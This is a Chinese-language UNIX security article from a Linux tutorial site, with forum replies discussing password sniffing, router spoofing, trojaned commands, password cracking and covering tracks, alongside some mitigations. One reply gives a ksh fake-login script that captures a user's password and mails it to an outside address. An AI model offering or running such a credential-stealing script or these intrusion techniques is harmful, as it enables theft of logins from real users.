歡迎來到Linux教程網
Linux教程網
Linux教程網
Linux教程網
Linux教程網 >> Unix知識 >> Unix教程 >> UNIX系統安全(二)

UNIX系統安全(二)

日期:2017/2/27 17:43:46   编辑:Unix教程

  當你為用戶精心設計了一系列安全措施後,用戶總會覺著有點“玄”。他憑什麼為這樣的網絡就是“安全”的呢?是根據設計方案的厚度?還是他為此所花的錢數?到底如何評價一個網絡的安全性呢?曾聽說過這樣的定義:“網絡的安全程度定義為該網絡被攻擊成功的可能性”,聽起來倒是蠻有哲理味兒的,可如何實際操作呢?計算機系統的安全程度可以用“橘皮書”的定義來評價,網絡系統是不是也可以搞出個“橘皮書”什麼的呢?
  
  當你左一層右一層地對信息加密時,心裡也許認為層數越多就越安全。但事實是不是真的這樣呢?當你又加了一層密時,到底增加了多少的安全性呢?
  
  “喏,你看....”,你指著自己的設計對用戶說“即使有人突破了第一道防線,我們還有第二道防線呢。即使第二道也被突破,我們仍然有第三道、第四....”。可憐的用戶望著得意洋洋的你,心裡不禁嘀咕:“干嘛搞這麼復雜....真的非這樣不可嗎?我可是只是想保證兩個星期的安全性啊。”
  
  為了防止大灰狼進來,小豬們把門窗都橫七豎八地釘了個死死的。可是大灰狼會不會從別處進來呢?比如說....壁爐的煙囪!聰明的小豬們在壁爐裡燒起了一鍋開水....。小豬們是聰明的,我們的系統管理員們呢?
  
  計算機系統的安全性依靠一種“訪問控制模型”來進行。有沒有可能建立一個“網絡安全模型”並對它進行形式化的證明,以便從理論上深入開展網絡安全的研究?這樣就可以擺脫目前的被動地“打補丁”的做法。
  
  網絡入侵和網絡安全是一對矛盾,沒有Hacker高手就不會有好的安全系統。這聽起來有些悲哀,可惜是事實。為了提高我們的安全防范能力,我看是不是先培養一批Hacker出來(中國的Hacker太少了)。在此提供幾條線索供Hacker們參考:
  
  用過Solaris的snoop命令嗎? 用它可以“聽到”同一共享網段內的其他用戶的口令(當然包括超級用戶的)。
  
  sendmail 5.5.9版本以前有個debug命令, 是個強有力的遠程調試工具,可惜也是一個大bug。
  
  冒充路由器可以看到所有往來的信息,RIP協議沒有身份認證的部分,雖然OSPF協議中有關於身份認證的部分,但很少有人用到。
  
  NFS、NIS都是不太安全的。
  
  1988年的WORM網絡病毒最厲害的地方並不是傳說中的利用 sendmail的缺陷,而是對看來毫無破綻的finger的攻擊!
  
  很多系統管理員為了關機方便而設立了halt之類的特殊用戶, 怎樣利用這一點來攻擊呢?
  
  侵入了一個系統之後,如何“打掃戰場”讓管理員看不出來? 如何潛伏下來以致於管理員除了重新安裝系統,別無清除的辦法呢?
  ....
  這些東西都不是我憑空想象的,國外的Hacker們就是這麼做的(他們還有很多更厲害的招數呢)。很多東西我也不知道該怎麼做,Hacker們自己努力吧。
  1-----
  :     1).用過Solaris的snoop命令嗎? 用它可以“聽到”同一共享網段內的其他用戶:  的口令(當然包括超級用戶的)。
  :     3).冒充路由器可以看到所有往來的信息,RIP協議沒有身份認證的部分,雖然:  OSPF協議中有關於身份認證的部分,但很少有人用到。
  
  這兩個是取得口令的最簡潔之法, 呵呵. -------         我也有一簡潔之法:
  
  把下面的shell 命令用 ksh 運行
  
  clear
  stty ignbrk
  echo "login:\c"
  read logname
  stty -echo
  echo "password:\c"
  read passwd
  print "\nLogin incorrect\n"
  print $logname $passwd | mail [email protected]
  stty 0
  stty echo
  exit
  -----
  嗯,是一種方法,但必須你能訪問對方的機器才能偷到口令。常用的方法還有在自己能用的目錄裡放上叫"ls" "grep"之類的程序,希望root能不小心運行到她們, 一旦獲得 root 權限, 呵呵, 下面的我就不用說了. 所以 root 的PATH裡不應當有 . (當前目錄).
  
  更徹底的方法就是根據passwd文件裡面的密文算口令的明文, 我曾經編過一個算passwd的程序, 能在 Pentium 100機器上用半個小時左右的時間算出長度<=5 && 只包含字母和數字 的口令. 因此選口令的時候要注意. 用jack14既可,攻擊得當的話6位不含大寫字母的pass也能在一月內破掉。
  
  這一方法要求必須取得對方含有密文的passwd文件(有shadow passwd的機器上需要取得/etc/shadow), 所以要注意機器上passwd的安全性 (不要試圖取消用戶對該文件的讀權限, 所有的用戶都需要能讀該文件).
  -----
  解決的辦法, 可以用firewall屏蔽網段。
  也可以使用SSL(secure socket layber)替代原有的socket明文數據傳輸。
  -----
  :      若干機器上都是用戶可以直接su halt, 然後就成為超級用戶了,
  :      有的機器你可以用rlogin hostname -l halt 對方的機器就被shutdown了,:
  
  我用su halt 然後就shutdown了. 有n個文件沒有存盤.
Copyright © Linux教程網 All Rights Reserved